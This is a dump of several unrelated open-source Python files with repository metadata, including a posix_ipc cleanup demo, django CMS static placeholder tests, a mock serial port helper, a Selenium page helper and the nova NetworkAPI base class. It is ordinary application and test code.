            elif pos > 0 and string[pos-1] == self.ESCAPESTRING and char in self.ESCAPE:
                newString.write(char)
            elif char in self.ESCAPE:
                # Literal bracket: stored as a one-character GLOB class.
                newString.write("["+char+"]")
            else:
                if (
                    (not hostname and not ident and char not in ALLOWEDCHARS)
                    or (hostname and char not in ALLOWEDCHARS_HOST)
                    or (ident and char not in ALLOWEDCHARS_IDENT)
                ):
                    raise InvalidCharacterUsed(string, char, pos)
                else:
                    newString.write(char)
        return newString.getvalue()
| {
"content_hash": "0fb53d47c53bbb57d282375e945338a6",
"timestamp": "",
"source": "github",
"line_count": 323,
"max_line_length": 104,
"avg_line_length": 37.73065015479876,
"alnum_prop": 0.49421514728809385,
"repo_name": "RenolY2/Renol-IRC",
"id": "8b9bf8f1d03c8a8ce27d0693890defe944c4fc0f",
"size": "12187",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "BanList.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "201288"
}
],
"symlink_target": ""
} |
import posix_ipc
import utils

# Remove the demo's message queue if a previous run left it behind.
try:
    posix_ipc.unlink_message_queue(utils.QUEUE_NAME)
    s = "message queue %s removed" % utils.QUEUE_NAME
    print(s)
except posix_ipc.ExistentialError:
    # Narrowed from a bare except: only "queue does not exist" means
    # nothing needs cleanup; any other failure should propagate.
    print("queue doesn't need cleanup")

print("\nAll clean!")
| {
"content_hash": "d1fd7b85d0e36360d62ad1860f60b875",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 53,
"avg_line_length": 18.153846153846153,
"alnum_prop": 0.6610169491525424,
"repo_name": "overcastcloud/posix_ipc",
"id": "53ada4220572bbbc9b79db9f7dfb524f3c57b563",
"size": "236",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "demo3/cleanup.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "118702"
},
{
"name": "HTML",
"bytes": "52082"
},
{
"name": "Python",
"bytes": "98714"
},
{
"name": "Shell",
"bytes": "358"
}
],
"symlink_target": ""
} |
from __future__ import with_statement
import json
from cms.api import add_plugin
from cms.constants import PLUGIN_MOVE_ACTION, PLUGIN_COPY_ACTION
from cms.models import StaticPlaceholder, Placeholder, CMSPlugin
from cms.tests.plugins import PluginsTestBaseCase
from cms.utils.compat.dj import force_unicode
from cms.utils.urlutils import admin_reverse
from django.contrib.admin.sites import site
from django.core.urlresolvers import reverse
from django.template import Context
from django.template.base import Template
URL_CMS_MOVE_PLUGIN = u'/en/admin/cms/page/%d/move-plugin/'
class StaticPlaceholderTestCase(PluginsTestBaseCase):
    """Tests for static placeholders: auto-creation from templates,
    rendering fallbacks, publishing, permissions, and plugin move/copy
    through the admin."""

    @property
    def admin_class(self):
        # ModelAdmin instance registered for StaticPlaceholder.
        return site._registry[StaticPlaceholder]

    def fill_placeholder(self, placeholder=None):
        """Add two text plugins (parent and child) to *placeholder*,
        creating a fresh placeholder when none is given; returns it."""
        if placeholder is None:
            placeholder = Placeholder(slot=u"some_slot")
            placeholder.save()  # a good idea, if not strictly necessary
        # plugin in placeholder
        plugin_1 = add_plugin(placeholder, u"TextPlugin", u"en",
                              body=u"01",
                              )
        plugin_1.save()
        # IMPORTANT: plugins must be reloaded, before they can be assigned
        # as a parent. Otherwise, the MPTT structure doesn't seem to rebuild
        # properly.
        # child of plugin_1
        plugin_2 = add_plugin(placeholder, u"TextPlugin", u"en",
                              body=u"02",
                              )
        plugin_1 = self.reload(plugin_1)
        plugin_2.parent = plugin_1
        plugin_2.save()
        return placeholder

    def get_admin(self):
        # Staff superuser used for admin requests in these tests.
        usr = self._create_user("admin", True, True)
        return usr

    def test_template_creation(self):
        """Rendering the static_placeholder tag auto-creates the
        StaticPlaceholder plus its draft and public placeholders."""
        self.assertObjectDoesNotExist(StaticPlaceholder.objects.all(), code='foobar')
        self.assertObjectDoesNotExist(Placeholder.objects.all(), slot='foobar')
        t = Template('{% load cms_tags %}{% static_placeholder "foobar" %}')
        t.render(self.get_context('/'))
        self.assertObjectExist(StaticPlaceholder.objects.all(), code='foobar',
                               creation_method=StaticPlaceholder.CREATION_BY_TEMPLATE)
        # Two placeholders: one draft, one public.
        self.assertEqual(Placeholder.objects.filter(slot='foobar').count(), 2)

    def test_empty(self):
        """The "or" fallback body renders only while the placeholder has
        no plugins; an empty code renders nothing."""
        self.assertObjectDoesNotExist(StaticPlaceholder.objects.all(), code='foobar')
        self.assertObjectDoesNotExist(Placeholder.objects.all(), slot='foobar')
        t = Template('{% load cms_tags %}{% static_placeholder "foobar" or %}No Content{% endstatic_placeholder %}')
        rendered = t.render(self.get_context('/'))
        self.assertIn("No Content", rendered)
        t = Template('{% load cms_tags %}{% static_placeholder "" %}')
        rendered = t.render(self.get_context('/'))
        self.assertEqual("", rendered)
        # The tag also accepts a StaticPlaceholder instance as variable.
        t = Template('{% load cms_tags %}{% static_placeholder code or %}No Content{% endstatic_placeholder %}')
        rendered = t.render(Context({'code': StaticPlaceholder.objects.all()[0]}))
        self.assertIn("No Content", rendered)
        for p in Placeholder.objects.all():
            add_plugin(p, 'TextPlugin', 'en', body='test')
        t = Template('{% load cms_tags %}{% static_placeholder "foobar" or %}No Content{% endstatic_placeholder %}')
        rendered = t.render(self.get_context('/'))
        self.assertNotIn("No Content", rendered)
        # Without the "site" flag the placeholder is site-independent.
        self.assertEqual(StaticPlaceholder.objects.filter(site_id__isnull=True, code='foobar').count(), 1)

    def test_local(self):
        """The "site" flag creates a site-bound static placeholder."""
        self.assertObjectDoesNotExist(StaticPlaceholder.objects.all(), code='foobar')
        self.assertObjectDoesNotExist(Placeholder.objects.all(), slot='foobar')
        t = Template('{% load cms_tags %}{% static_placeholder "foobar" site or %}No Content{% endstatic_placeholder %}')
        rendered = t.render(self.get_context('/'))
        self.assertIn("No Content", rendered)
        for p in Placeholder.objects.all():
            add_plugin(p, 'TextPlugin', 'en', body='test')
        rendered = t.render(self.get_context('/'))
        self.assertNotIn("No Content", rendered)
        self.assertEqual(StaticPlaceholder.objects.filter(site_id__isnull=False, code='foobar').count(), 1)

    def test_publish_stack(self):
        """Publishing a page with 'statics' in the query copies the
        dirty draft placeholder content to public."""
        static_placeholder = StaticPlaceholder.objects.create(name='foo', code='bar', site_id=1)
        self.fill_placeholder(static_placeholder.draft)
        static_placeholder.dirty = True
        static_placeholder.save()
        self.assertEqual(static_placeholder.draft.cmsplugin_set.all().count(), 2)
        self.assertEqual(static_placeholder.public.cmsplugin_set.all().count(), 0)
        with self.login_user_context(self.get_superuser()):
            response = self.client.get(reverse("admin:cms_page_publish_page", args=[1, 'en']), {'statics':[static_placeholder.pk]})
            self.assertEqual(response.status_code, 302)

    def test_permissions(self):
        """change_staticplaceholder grants change; publish additionally
        requires publish_page (superusers get both)."""
        static_placeholder = StaticPlaceholder.objects.create(name='foo', code='bar', site_id=1)
        request = self.get_request()

        request.user = self._create_user('user_a', is_staff=True, is_superuser=False, permissions=['change_staticplaceholder'])
        self.assertTrue( static_placeholder.has_change_permission(request) )
        self.assertFalse( static_placeholder.has_publish_permission(request) )

        request.user = self._create_user('user_b', is_staff=True, is_superuser=False, permissions=['change_staticplaceholder', 'publish_page'])
        self.assertTrue( static_placeholder.has_change_permission(request) )
        self.assertTrue( static_placeholder.has_publish_permission(request) )

        request.user = self.get_superuser()
        self.assertTrue( static_placeholder.has_change_permission(request) )
        self.assertTrue( static_placeholder.has_publish_permission(request) )

    def test_move_plugin(self):
        """Moving a plugin between static placeholders marks both
        source and target as dirty."""
        static_placeholder_source = StaticPlaceholder.objects.create(name='foobar', code='foobar', site_id=1)
        static_placeholder_target = StaticPlaceholder.objects.create(name='foofoo', code='foofoo', site_id=1)
        sourceplugin = add_plugin(static_placeholder_source.draft, 'TextPlugin', 'en', body='test')
        plugin_class = sourceplugin.get_plugin_class_instance()
        expected = {'reload': plugin_class.requires_reload(PLUGIN_MOVE_ACTION)}

        admin = self.get_admin()
        with self.login_user_context(admin):
            request = self.get_request(post_data={'plugin_id': sourceplugin.pk,
                'placeholder_id': static_placeholder_target.draft.id,
                'plugin_parent': '', 'plugin_language': 'en'})
            response = self.admin_class.move_plugin(request)
            self.assertEqual(response.status_code, 200)
            self.assertEqual(json.loads(response.content.decode('utf8')), expected)
            source = StaticPlaceholder.objects.get(pk=static_placeholder_source.pk)
            target = StaticPlaceholder.objects.get(pk=static_placeholder_target.pk)
            self.assertTrue(source.dirty)
            self.assertTrue(target.dirty)

    def test_copy_plugin(self):
        """Copying a plugin marks only the target as dirty; the response
        lists the plugins now in the target placeholder."""
        static_placeholder_source = StaticPlaceholder.objects.create(name='foobar', code='foobar', site_id=1)
        static_placeholder_target = StaticPlaceholder.objects.create(name='foofoo', code='foofoo', site_id=1)
        sourceplugin = add_plugin(static_placeholder_source.draft, 'TextPlugin', 'en', body='test source')
        targetplugin = add_plugin(static_placeholder_target.draft, 'TextPlugin', 'en', body='test dest')
        # Reset the dirty bit set by adding the source plugin.
        StaticPlaceholder.objects.filter(pk=static_placeholder_source.pk).update(dirty=False)
        plugin_class = sourceplugin.get_plugin_class_instance()

        admin = self.get_admin()
        with self.login_user_context(admin):
            request = self.get_request(post_data={
                'source_language': 'en',
                'source_placeholder_id': static_placeholder_source.draft.pk,
                'source_plugin_id': sourceplugin.pk,
                'target_language': 'en',
                'target_placeholder_id': static_placeholder_target.draft.pk,
                'targetplugin_id': targetplugin.pk,
            })
            response = self.admin_class.copy_plugins(request)

            # generate the expected response
            plugin_list = CMSPlugin.objects.filter(
                language='en', placeholder_id=static_placeholder_target.draft.pk).order_by(
                    'depth', 'position')
            reduced_list = []
            for plugin in plugin_list:
                reduced_list.append(
                    {
                        'id': plugin.pk, 'type': plugin.plugin_type, 'parent': plugin.parent_id,
                        'position': plugin.position, 'desc': force_unicode(plugin.get_short_description()),
                        'language': plugin.language, 'placeholder_id': static_placeholder_target.draft.pk
                    }
                )
            expected = json.loads(
                json.dumps({'plugin_list': reduced_list, 'reload': plugin_class.requires_reload(PLUGIN_COPY_ACTION)}))

            self.assertEqual(response.status_code, 200)
            self.assertEqual(json.loads(response.content.decode('utf8')), expected)

            # Check dirty bit
            source = StaticPlaceholder.objects.get(pk=static_placeholder_source.pk)
            target = StaticPlaceholder.objects.get(pk=static_placeholder_target.pk)
            self.assertFalse(source.dirty)
            self.assertTrue(target.dirty)

    def test_create_by_admin(self):
        """A static placeholder can be created through the admin add view."""
        url = admin_reverse("cms_staticplaceholder_add")
        with self.login_user_context(self.get_superuser()):
            response = self.client.post(url, data={'name': 'Name', 'code': 'content'})
            self.assertEqual(response.status_code, 302)
| {
"content_hash": "351d856c099132be9895de6ee1b2e48c",
"timestamp": "",
"source": "github",
"line_count": 192,
"max_line_length": 143,
"avg_line_length": 51.104166666666664,
"alnum_prop": 0.647778230737872,
"repo_name": "samirasnoun/django_cms_gallery_image",
"id": "6e0bfc58d71864a734eb11c71e81206376b43798",
"size": "9836",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "cms/tests/static_placeholder.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "245718"
},
{
"name": "JavaScript",
"bytes": "1060264"
},
{
"name": "Makefile",
"bytes": "2973"
},
{
"name": "PHP",
"bytes": "2274"
},
{
"name": "Python",
"bytes": "3309714"
},
{
"name": "Ruby",
"bytes": "1980"
},
{
"name": "XSLT",
"bytes": "10244"
}
],
"symlink_target": ""
} |
from functools import wraps
from itertools import islice
from nose.tools import assert_false
from nose.tools import assert_in
from nose.tools import eq_
from nose.tools import ok_
def _mock_method(function):
    """Decorator that records each call as (name, args, kwargs) in the
    instance's ``_method_calls`` list before delegating to *function*.

    Uses ``function.__name__`` (portable across Python 2 and 3) instead
    of the Python-2-only ``func_name`` attribute.
    """
    function_name = function.__name__

    @wraps(function)
    def decorator(self, *args, **kwargs):
        self._method_calls.append((function_name, args, kwargs))
        result = function(self, *args, **kwargs)
        return result

    return decorator
class MockSerialPort(object):
    """Test double for a serial port.

    Every public port operation is wrapped with ``_mock_method``, which
    records the call in ``self._method_calls``; actual data transfer is
    delegated to a writer/reader pair so tests can assert on what was
    called, written and read.
    """

    def __init__(self, writer=None, reader=None):
        self._method_calls = []
        self._data_writer = writer or MockSerialPortDataWriter()
        self._data_reader = reader or MockSerialPortDataReader()

    def clear_data(self):
        """Reset the recorded written/read data (the call log is kept)."""
        self._data_writer.data_written = ""
        self._data_reader.data_read = ""

    def assert_method_was_called(self, method_name, *args, **kwargs):
        """Assert *method_name* was called at least once with exactly
        these positional and keyword arguments."""
        method_calls = \
            [call[1:] for call in self._method_calls if call[0] == method_name]
        ok_(
            method_calls,
            "Method {!r} was not called".format(method_name),
        )

        wrong_arguments_message = \
            "Method {!r} was not called with the expected arguments: " \
            "Expected: {}".format(
                method_name,
                (args, kwargs),
            )
        assert_in(
            (args, kwargs),
            method_calls,
            wrong_arguments_message,
        )

    def assert_data_was_written(self, expected_data):
        """Assert the exact data written; a trailing newline+carriage
        return pair is appended to the expectation when missing."""
        if not expected_data.endswith("\n\r"):
            expected_data += "\n\r"
        actual_data = self._data_writer.data_written
        eq_(
            expected_data,
            actual_data,
            "Data {!r} was not written to the port, found {!r}".format(
                expected_data,
                actual_data,
            ),
        )

    def assert_no_data_was_written(self):
        """Assert nothing at all was written to the port."""
        actual_data = self._data_writer.data_written
        assert_false(
            actual_data,
            "No data was expected, found {!r}".format(actual_data),
        )

    def assert_data_was_read(self, data):
        """Assert the exact data read; a trailing ">" prompt is appended
        to the expectation when missing (mirroring the reader)."""
        if not data.endswith(">"):
            data += ">"
        eq_(
            data,
            self._data_reader.data_read,
            "Data {!r} was not read from the port".format(data),
        )

    def assert_scenario(self, *calls):
        """Assert the recorded call log matches *calls* pairwise.

        Each expected call is a (method_name, args, kwargs) triple.
        NOTE: zip() stops at the shorter sequence, so surplus recorded
        or expected calls are not reported by this check.
        """
        for expected_call, actual_call in zip(calls, self._method_calls):
            expected_method_name, expected_args, expected_kwargs = expected_call
            actual_method_name, actual_args, actual_kwargs = actual_call
            eq_(
                expected_method_name,
                actual_method_name,
                "Expected call to {!r} found {!r}".format(
                    expected_method_name,
                    actual_method_name,
                )
            )
            eq_(
                expected_args,
                actual_args,
                "In call to {!r} expected args {!r} found {!r}".format(
                    expected_method_name,
                    expected_args,
                    actual_args,
                )
            )
            # BUG FIX: this comparison previously re-checked the
            # positional arguments; it now checks the keyword arguments,
            # matching its own error message.
            eq_(
                expected_kwargs,
                actual_kwargs,
                "In call to {!r} expected kwargs {!r} found {!r}".format(
                    expected_method_name,
                    expected_kwargs,
                    actual_kwargs,
                )
            )

    @_mock_method
    def read(self, size=1):
        return self._data_reader.read(size)

    @_mock_method
    def write(self, data):
        self._data_writer.write(data)

    @_mock_method
    def flushOutput(self):
        pass

    @_mock_method
    def flushInput(self):
        pass

    @_mock_method
    def close(self):
        pass
class MockSerialPortDataWriter(object):
    """Accumulates everything written to the mock serial port in the
    ``data_written`` attribute."""

    def __init__(self):
        self.data_written = ""

    def write(self, data):
        self.data_written = self.data_written + data
class MockSerialPortDataReader(object):
    """Feeds canned data back to the mock serial port.

    A ">" prompt character is appended to the canned data when absent;
    everything handed out through read() is also accumulated in
    ``data_read`` for later assertions.
    """

    def __init__(self, data=None):
        self.data_read = ""
        self._expected_data = None
        self._set_expected_data(data or "")

    def read(self, size):
        # Pull at most *size* characters off the canned-data iterator.
        pieces = islice(self._expected_data, size)
        chunk = "".join(pieces)
        self.data_read = self.data_read + chunk
        return chunk

    def _set_expected_data(self, data):
        if ">" not in data:
            data = data + ">"
        self._expected_data = iter(data)
        self.data_read = ""
| {
"content_hash": "baf1812605d94168281e28ab68c6692b",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 80,
"avg_line_length": 27.162650602409638,
"alnum_prop": 0.5169660678642715,
"repo_name": "franciscoruiz/python-elm",
"id": "20d1e922e91a2038b653119f0d35b6d62b940f95",
"size": "4509",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "31761"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, unicode_literals
from django.test import TestCase
from django.db import IntegrityError
# from . import factory
from ..models import Configuration
import logging
import hashlib
import datetime
from . import factory
LOG = logging.getLogger(__name__)
class ConfigurationTest(TestCase):
    """Unit tests for the Configuration model's typed lookup helpers."""

    def setUp(self):
        # Persisted Configuration instance produced by the test factory.
        self.conf_model = factory.ConfigurationFactory()

    def test_get_empty_list(self):
        """
        Tests get empty list when variable name does not exists
        """
        self.assertEquals(Configuration.get_by_name_as_list("abc"), [])

    def test_get_conf_by_name_all_fields(self):
        """
        Tests get conf by name with all fields method
        """
        conf_name = "newcfg"
        Configuration(
            name=conf_name,
            value="1",
            description="test"
        ).save()
        self.assertEquals(
            Configuration.get_by_name_all_fields(conf_name).value, "1")

    def test_validate_hash(self):
        # The model's hash is expected to equal the SHA-256 hex digest
        # of name + value + description + today's date as ddmmYYYY.
        conf = self.conf_model
        to_hash = "%s%s%s%s" % (
            conf.name,
            conf.value,
            conf.description,
            datetime.date.strftime(datetime.date.today(), "%d%m%Y")
        )
        hash = hashlib.sha256(to_hash.encode("utf8")).hexdigest()
        self.assertEquals(conf.hash, hash)

    def test_get_cache_key(self):
        # Cache keys are namespaced with a "cfg:" prefix.
        conf = self.conf_model
        k = "cfg:%s" % conf.name
        self.assertEquals(conf.get_cache_key(conf.name), k)

    def test_get_by_name_as_int(self):
        # A stored string value "1" comes back as the int 1.
        conf_name = "new_conf_as_int"
        Configuration(
            name=conf_name,
            value="1",
            description="test"
        ).save()
        get_conf = Configuration.get_by_name_as_int(conf_name)
        self.assertIsInstance(get_conf, int)
        self.assertEquals(get_conf, 1)

    def test_get_by_name_as_float(self):
        # A stored string value "1.4" comes back as the float 1.4.
        conf_name = "new_conf_as_float"
        Configuration(
            name=conf_name,
            value="1.4",
            description="test"
        ).save()
        get_conf = Configuration.get_by_name_as_float(conf_name)
        self.assertIsInstance(get_conf, float)
        self.assertEquals(get_conf, 1.4)

    def test_get_by_name(self):
        # get_by_name returns the raw (string) value.
        conf = self.conf_model
        get_conf = Configuration.get_by_name(conf.name)
        self.assertEquals(get_conf, conf.value)
| {
"content_hash": "2bc189f423a7d979a7c68f90e8d96d06",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 71,
"avg_line_length": 28.321428571428573,
"alnum_prop": 0.5910046237915091,
"repo_name": "globocom/database-as-a-service",
"id": "81ae29e434d8b941dafd673450684c96cbc6fb39",
"size": "2403",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dbaas/system/tests/test_configuration.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "243568"
},
{
"name": "Dockerfile",
"bytes": "1372"
},
{
"name": "HTML",
"bytes": "310401"
},
{
"name": "JavaScript",
"bytes": "988830"
},
{
"name": "Makefile",
"bytes": "5199"
},
{
"name": "Python",
"bytes": "9674426"
},
{
"name": "Shell",
"bytes": "215115"
}
],
"symlink_target": ""
} |
class GroupHelper:
    """Page-object style helper for the application's "groups" page.

    All interaction goes through ``self.app.driver`` (a Selenium
    WebDriver-like object).
    """

    def __init__(self, app):
        self.app = app

    def open_groups_page(self):
        """Navigate to the groups page via its link."""
        driver = self.app.driver
        # open groups page
        driver.find_element_by_link_text("groups").click()

    def _fill_field(self, field_name, value):
        # Deduplicated from create(): click, clear, then type the value.
        # The element is located anew for every action, exactly as the
        # original inline code did.
        driver = self.app.driver
        driver.find_element_by_name(field_name).click()
        driver.find_element_by_name(field_name).clear()
        driver.find_element_by_name(field_name).send_keys(value)

    def create(self, group):
        """Create a new group from an object with name/header/footer."""
        driver = self.app.driver
        self.open_groups_page()
        # create new group
        driver.find_element_by_name("new").click()
        self._fill_field("group_name", group.name)
        self._fill_field("group_header", group.header)
        self._fill_field("group_footer", group.footer)
        driver.find_element_by_name("submit").click()
        self.return_to_groups_page()

    def delete_first_group(self):
        """Select the first listed group and delete it."""
        driver = self.app.driver
        self.open_groups_page()
        driver.find_element_by_name("selected[]").click()
        driver.find_element_by_name("delete").click()
        self.return_to_groups_page()

    def return_to_groups_page(self):
        """Return to the groups listing after a form submission."""
        driver = self.app.driver
        # returns to groups page
        driver.find_element_by_link_text("groups").click()
"content_hash": "5ae446d0c7c36e133700de858620b11e",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 75,
"avg_line_length": 36.833333333333336,
"alnum_prop": 0.616677440206852,
"repo_name": "Antikiy/python_training",
"id": "cbf82ccb51e3075bab10d14a6c3b105908ad3722",
"size": "1548",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "fixture/group.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3952"
}
],
"symlink_target": ""
} |
import functools
import inspect
from nova.db import base
from nova import hooks
from nova.i18n import _
from nova.network import model as network_model
from nova import objects
from nova.openstack.common import excutils
from nova.openstack.common import lockutils
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
@hooks.add_hook('instance_network_info')
def update_instance_cache_with_nw_info(impl, context, instance,
                                       nw_info=None, update_cells=True):
    """Store *nw_info* in the instance's info cache.

    When *nw_info* is missing or not a NetworkInfo instance, it is
    re-fetched via ``impl._get_instance_nw_info``.  Any failure is
    logged and then re-raised.
    """
    try:
        # Anything that is not a NetworkInfo is treated as "not given"
        # and triggers a fresh lookup.
        if not isinstance(nw_info, network_model.NetworkInfo):
            nw_info = None
        if nw_info is None:
            nw_info = impl._get_instance_nw_info(context, instance)
        LOG.debug('Updating cache with info: %s', nw_info)
        # NOTE(comstud): The save() method actually handles updating or
        # creating the instance.  We don't need to retrieve the object
        # from the DB first.
        ic = objects.InstanceInfoCache.new(context, instance['uuid'])
        ic.network_info = nw_info
        ic.save(update_cells=update_cells)
    except Exception:
        with excutils.save_and_reraise_exception():
            LOG.exception(_('Failed storing info cache'), instance=instance)
def refresh_cache(f):
    """Decorator to update the instance_info_cache

    Requires context and instance as function args
    """
    argspec = inspect.getargspec(f)

    @functools.wraps(f)
    def wrapper(self, context, *args, **kwargs):
        res = f(self, context, *args, **kwargs)

        try:
            # get the instance from arguments (or raise ValueError)
            instance = kwargs.get('instance')
            if not instance:
                # argspec.args includes 'self' and 'context', which are
                # consumed explicitly by wrapper(); subtract 2 to map
                # the argspec index into *args.
                instance = args[argspec.args.index('instance') - 2]
        except ValueError:
            msg = _('instance is a required argument to use @refresh_cache')
            raise Exception(msg)

        # Serialize cache refreshes per instance UUID.
        with lockutils.lock('refresh_cache-%s' % instance['uuid']):
            update_instance_cache_with_nw_info(self, context, instance,
                                               nw_info=res)
        # return the original function's return value
        return res
    return wrapper
# Unique module-level sentinel; presumably used to distinguish
# "argument not supplied" from an explicit None -- confirm against the
# methods defined later in this module.
SENTINEL = object()
class NetworkAPI(base.Base):
    """Base Network API for doing networking operations.
    New operations available on specific clients must be added here as well.
    """
    # Every operation below is an abstract stub (raises NotImplementedError);
    # concrete network drivers subclass NetworkAPI and override them.
    def __init__(self, **kwargs):
        super(NetworkAPI, self).__init__(**kwargs)
    # --- Network CRUD ---
    def get_all(self, context):
        """Get all the networks for client."""
        raise NotImplementedError()
    def get(self, context, network_uuid):
        """Get specific network for client."""
        raise NotImplementedError()
    def create(self, context, **kwargs):
        """Create a network."""
        raise NotImplementedError()
    def delete(self, context, network_uuid):
        """Delete a specific network."""
        raise NotImplementedError()
    def disassociate(self, context, network_uuid):
        """Disassociate a network for client."""
        raise NotImplementedError()
    # --- Fixed / floating IP lookups ---
    def get_fixed_ip(self, context, id):
        """Get fixed ip by id."""
        raise NotImplementedError()
    def get_fixed_ip_by_address(self, context, address):
        """Get fixed ip by address."""
        raise NotImplementedError()
    def get_floating_ip(self, context, id):
        """Get floating ip by id."""
        raise NotImplementedError()
    def get_floating_ip_pools(self, context):
        """Get floating ip pools."""
        raise NotImplementedError()
    def get_floating_ip_by_address(self, context, address):
        """Get floating ip by address."""
        raise NotImplementedError()
    def get_floating_ips_by_project(self, context):
        """Get floating ips by project."""
        raise NotImplementedError()
    def get_floating_ips_by_fixed_address(self, context, fixed_address):
        """Get floating ips by fixed address."""
        raise NotImplementedError()
    def get_instance_id_by_floating_address(self, context, address):
        """Get instance id by floating address."""
        raise NotImplementedError()
    def get_vifs_by_instance(self, context, instance):
        """Get vifs by instance."""
        raise NotImplementedError()
    def get_vif_by_mac_address(self, context, mac_address):
        """Get vif mac address."""
        raise NotImplementedError()
    # --- Floating IP lifecycle ---
    def allocate_floating_ip(self, context, pool=None):
        """Adds (allocate) floating ip to a project from a pool."""
        raise NotImplementedError()
    def release_floating_ip(self, context, address,
                            affect_auto_assigned=False):
        """Removes (deallocates) a floating ip with address from a project."""
        raise NotImplementedError()
    def disassociate_and_release_floating_ip(self, context, instance,
                                             floating_ip):
        """Removes (deallocates) and deletes the floating ip."""
        raise NotImplementedError()
    def associate_floating_ip(self, context, instance,
                              floating_address, fixed_address,
                              affect_auto_assigned=False):
        """Associates a floating ip with a fixed ip."""
        raise NotImplementedError()
    def disassociate_floating_ip(self, context, instance, address,
                                 affect_auto_assigned=False):
        """Disassociates a floating ip from fixed ip it is associated with."""
        raise NotImplementedError()
    # --- Instance network allocation ---
    def allocate_for_instance(self, context, instance, vpn,
                              requested_networks, macs=None,
                              security_groups=None,
                              dhcp_options=None):
        """Allocates all network structures for an instance.

        :param context: The request context.
        :param instance: nova.objects.instance.Instance object.
        :param vpn: A boolean, if True, indicate a vpn to access the instance.
        :param requested_networks: A dictionary of requested_networks,
            Optional value containing network_id, fixed_ip, and port_id.
        :param macs: None or a set of MAC addresses that the instance
            should use. macs is supplied by the hypervisor driver (contrast
            with requested_networks which is user supplied).
        :param security_groups: None or security groups to allocate for
            instance.
        :param dhcp_options: None or a set of key/value pairs that should
            determine the DHCP BOOTP response, eg. for PXE booting an instance
            configured with the baremetal hypervisor. It is expected that these
            are already formatted for the neutron v2 api.
            See nova/virt/driver.py:dhcp_options_for_instance for an example.
        :returns: network info as from get_instance_nw_info() below
        """
        raise NotImplementedError()
    def deallocate_for_instance(self, context, instance,
                                requested_networks=None):
        """Deallocates all network structures related to instance."""
        raise NotImplementedError()
    def allocate_port_for_instance(self, context, instance, port_id,
                                   network_id=None, requested_ip=None):
        """Allocate port for instance."""
        raise NotImplementedError()
    def deallocate_port_for_instance(self, context, instance, port_id):
        """Deallocate port for instance."""
        raise NotImplementedError()
    def list_ports(self, *args, **kwargs):
        """List ports."""
        raise NotImplementedError()
    def show_port(self, *args, **kwargs):
        """Show specific port."""
        raise NotImplementedError()
    def add_fixed_ip_to_instance(self, context, instance, network_id):
        """Adds a fixed ip to instance from specified network."""
        raise NotImplementedError()
    def remove_fixed_ip_from_instance(self, context, instance, address):
        """Removes a fixed ip from instance from specified network."""
        raise NotImplementedError()
    def add_network_to_project(self, context, project_id, network_uuid=None):
        """Force adds another network to a project."""
        raise NotImplementedError()
    # NOTE: SENTINEL defaults let callers distinguish "not passed" from an
    # explicit None for host/project.
    def associate(self, context, network_uuid, host=SENTINEL,
                  project=SENTINEL):
        """Associate or disassociate host or project to network."""
        raise NotImplementedError()
    def get_instance_nw_info(self, context, instance, **kwargs):
        """Returns all network info related to an instance."""
        raise NotImplementedError()
    def create_pci_requests_for_sriov_ports(self, context,
                                            pci_requests,
                                            requested_networks):
        """Check requested networks for any SR-IOV port request.

        Create a PCI request object for each SR-IOV port, and add it to the
        pci_requests object that contains a list of PCI request object.
        """
        raise NotImplementedError()
    def validate_networks(self, context, requested_networks, num_instances):
        """validate the networks passed at the time of creating
        the server.

        Return the number of instances that can be successfully allocated
        with the requested network configuration.
        """
        raise NotImplementedError()
    def get_instance_uuids_by_ip_filter(self, context, filters):
        """Returns a list of dicts in the form of
        {'instance_uuid': uuid, 'ip': ip} that matched the ip_filter
        """
        raise NotImplementedError()
    # --- DNS operations ---
    def get_dns_domains(self, context):
        """Returns a list of available dns domains.

        These can be used to create DNS entries for floating ips.
        """
        raise NotImplementedError()
    def add_dns_entry(self, context, address, name, dns_type, domain):
        """Create specified DNS entry for address."""
        raise NotImplementedError()
    def modify_dns_entry(self, context, name, address, domain):
        """Create specified DNS entry for address."""
        raise NotImplementedError()
    def delete_dns_entry(self, context, name, domain):
        """Delete the specified dns entry."""
        raise NotImplementedError()
    def delete_dns_domain(self, context, domain):
        """Delete the specified dns domain."""
        raise NotImplementedError()
    def get_dns_entries_by_address(self, context, address, domain):
        """Get entries for address and domain."""
        raise NotImplementedError()
    def get_dns_entries_by_name(self, context, name, domain):
        """Get entries for name and domain."""
        raise NotImplementedError()
    def create_private_dns_domain(self, context, domain, availability_zone):
        """Create a private DNS domain with nova availability zone."""
        raise NotImplementedError()
    def create_public_dns_domain(self, context, domain, project=None):
        """Create a public DNS domain with optional nova project."""
        raise NotImplementedError()
    # --- Host / migration plumbing ---
    def setup_networks_on_host(self, context, instance, host=None,
                               teardown=False):
        """Setup or teardown the network structures on hosts related to
        instance.
        """
        raise NotImplementedError()
    def migrate_instance_start(self, context, instance, migration):
        """Start to migrate the network of an instance."""
        raise NotImplementedError()
    def migrate_instance_finish(self, context, instance, migration):
        """Finish migrating the network of an instance."""
        raise NotImplementedError()
| {
"content_hash": "e8065a42233fa60b022b7463f0599232",
"timestamp": "",
"source": "github",
"line_count": 303,
"max_line_length": 79,
"avg_line_length": 38.772277227722775,
"alnum_prop": 0.6287027579162411,
"repo_name": "redhat-openstack/nova",
"id": "f43820bf5affa94f4496e062535e1aac0c5c1ab0",
"size": "12383",
"binary": false,
"copies": "4",
